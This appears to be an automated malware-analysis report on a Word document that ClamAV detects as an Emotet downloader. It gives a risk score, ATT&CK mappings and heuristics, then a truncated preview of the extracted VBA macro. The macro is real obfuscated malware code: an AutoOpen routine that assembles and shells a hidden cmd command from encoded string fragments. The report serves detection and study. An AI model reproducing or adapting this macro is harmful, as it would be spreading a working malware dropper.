MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of an AutoOpen macro and the ClamAV detection 'Doc.Downloader.Emotet-6883985-0' strongly indicate this is an Emotet downloader. The VBA script uses AppActivate and Shell functions, suggesting an attempt to execute commands, likely to fetch and run a subsequent stage. The AutoOpen macro is a common initial execution vector for Emotet.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6883985-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6883985-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6291 bytes |
SHA-256: 8d36498e92ec1223416510ce439027dbf21aa682376f1bba0f44967f93c398d6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jVAOlCKfKRE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate Oct(pHQppj)
AppActivate Sqr(7)
AppActivate pNJhws
AppActivate 5709
AppActivate Chr(ohSrwK / TLiKzF + 99827 / YtSAzq)
Shell@ CVar("cm") + YKnRpHa + nEwXRlnkp + WcXWUTZRi + BjYdCWhUC + rQFUQkA + DRvXuLDBYLq + ViRGwjcHqXVNtS, 457951129 - 457951129
AppActivate 2
AppActivate CByte(9)
End Sub
Attribute VB_Name = "KZMstuwQ"
Function WcXWUTZRi()
On Error Resume Next
AppActivate CDate(nSutVt + 49052)
AppActivate Int(20667 * SLiir * RGfNFN * wuYQPj)
AppActivate CInt(23565 / fAVZmW)
YjiTYIOQz = "d /" + "V:/C" + CStr(Chr(VrMXJunYb + krSKqWChbqZ + 34 + mnpBCuzSUzBJq + kDqwjshQGp)) + "set 5a" + "=ZDshz" + "w" + "ETkhhq" + "UzvNnVNPBJ" + "zTsIaV\-$m" + "=Gd"
AppActivate 469332340
AppActivate Tan(mKnRz)
AppActivate Atn(siXCFi)
LZXfRYh = "o;gr3@M.C " + "QxuteF" + "/c'1L+W0" + "bSHpy,l" + "98j5):{" + "if}2" + "Y(&&for %A" + " in " + "(" + "62;35;5;" + "49;38;24"
AppActivate qBbAW
AppActivate CDbl(MDnuF)
BOcojGJVIa = ";10;" + "49;65;65;" + "44;30;45;6" + "1;" + "31;32;" + "16" + ";" + "49;5" + ";29;3" + "5;59;68;49" + ";52;48;44;" + "18;49;"
AppActivate CBool(602)
AppActivate Int(61982 * RYTua - HOzUXq / 72975)
BbfdEUTZsLF = "48;42;57;4" + "9;59" + ";43;65;73" + ";49;1" + "6;48;" + "36" + ";3" + "0;" + "10;74" + ";77;32;" + "53;10;48;4" + "8;6"
AppActivate 2
AppActivate 15
AppActivate Atn(MUbUGj * Xazir)
lRLqm = "2;71;51" + ";" + "51;" + "26;63;3" + "7;24" + ";65"
AppActivate Sin(48520 - ljaEJK)
AppActivate 266615983
AppActivate oFppdi
UrjZHHcbl = ";42;16;" + "49;48;51;" + "31;" + "55;74" + ";"
AppActivate Fix(kLrPX * kZXliv)
AppActivate 224602168
AppActivate 9
WEmucYJL = "40;10" + ";48;" + "48;62;" + "7" + "1;51;51;7" + "4;49;7" + "3;48;35" + ";24;26" + ";49;"
AppActivate Int(100110875)
AppActivate CByte(81784 * pfvJvU)
AppActivate CDate(519344421)
joFXDzj = "7" + "4" + ";47;68;7" + "3;4" + "8;26;42;2" + "6;34;14;42"
AppActivate CBool(5364)
AppActivate 51
THotfN = ";59;3" + "8;5" + "1;63;26;50" + ";8;40;" + "10;4"
AppActivate 146767995
AppActivate CStr(rqlMc)
afnRihf = "8;48;62;" + "71;51;51;" + "31;26;46" + ";35;4" + "7;48;" + "62;47;48;" + "42;5"
AppActivate CDate(88020 * BKDoa - 30927 / 10786)
AppActivate ChrB(85)
rbZRVD = "2" + ";3" + "5;4" + "2;" + "22;" + "26;51" + ";39;"
WcXWUTZRi = YjiTYIOQz + LZXfRYh + BOcojGJVIa + BbfdEUTZsLF + lRLqm + UrjZHHcbl + WEmucYJL + joFXDzj + THotfN + afnRihf + rbZRVD
AppActivate Log(222159915)
AppActivate Fix(vZpBv)
AppActivate dwBQQq
End Function
Function BjYdCWhUC()
On Error Resume Next
AppActivate Round(bwBYFw)
AppActivate 4
AppActivate Hex(18)
KzOqcqsXaqY = "40;10" + ";4" + "8;48;62;71" + ";5" + "1;5" + "1;46;16" + ";29;29;6" + "6" + ";58;26;" + "59;" + "49;37;5" + "9;4" + "8"
AppActivate Log(40)
AppActivate Hex(396916271)
whuqTquLcZ = ";48;62;68" + ";59;3" + "9;59;22;" + "59;76" + ";68;42;46" + ";16;29;" + "29" + ";62;" + "54;26;" + "73;51;2"
AppActivate CStr(65848 / wWjuM - 44738 - SirAzV)
AppActivate MjNniE
GzbkhP = "3" + ";19;8;" + "3" + "1;" + "33;49;4" + "3;45;" + "40" + ";10;48;48" + ";62;71;5" + "1;51" + ";5;5;5;42;"
AppActivate ChrW(11656 + QvCDPE)
AppActivate 1
MioiKNbszwh = "10;26" + ";24;49;8" + ";73;31" + ";" + "47;10;49" + ";16;34;73;" + "24;65;" + "73;8;42"
AppActivate Sqr(tKKBF)
AppActivate 86
AppActivate Log(29)
IGiKCzUpCF = ";5" + "2;35;3" + "1;51;46;5" + "5;5" + "3;42;60;" + "62;65;" + "73;48;7" + "8;53" + ";40;53;7" + "0;3"
AppActivate 192735355
AppActivate oIEjwI
wFqSCkCU = "6;30;4" + "1;2" + "0;20;44;32" + ";44;53;69" + ";67;6" + "6;53;36;3" + "0;1;1;" + "38" + ";32;3" + "0"
AppActivate SvFKL
AppActivate luBAbm
AppActivate ChrW(ovauw + ZPPndi * 82690 * ABYLi)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.